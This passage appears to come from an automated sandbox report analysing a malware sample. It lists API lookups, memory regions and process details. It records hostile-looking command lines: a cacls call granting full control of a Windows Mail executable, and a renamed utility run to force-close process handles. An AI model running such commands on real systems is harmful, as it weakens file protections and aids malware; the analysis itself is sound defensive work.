| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:30 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #134: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #134 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:52, Reason: Child Process |
| Unmonitor | End Time: 00:04:57, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x94c |
| Parent PID | 0x6e0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
990
0x
EA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000006f0000 | 0x006f0000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x00703fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00711fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00713fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x00733fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x007f0000 | 0x008adfff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe.mui | 0x008b0000 | 0x008b1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0095ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00cdffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04d80000 | 0x050b6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eac0000 | 0x7eac0000 | 0x7ebbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ebc0000 | 0x7ebc0000 | 0x7ebe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ebe7000 | 0x7ebe7000 | 0x7ebe7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebe9000 | 0x7ebe9000 | 0x7ebebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebec000 | 0x7ebec000 | 0x7ebeefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebef000 | 0x7ebef000 | 0x7ebeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #135: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #135 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:53, Reason: Child Process |
| Unmonitor | End Time: 00:04:56, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xec0 |
| Parent PID | 0xf04 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
24C
0x
C2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a57fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x00be0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bf0000 | 0x00bf0000 | 0x01feffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x743b0000 | 0x74441fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
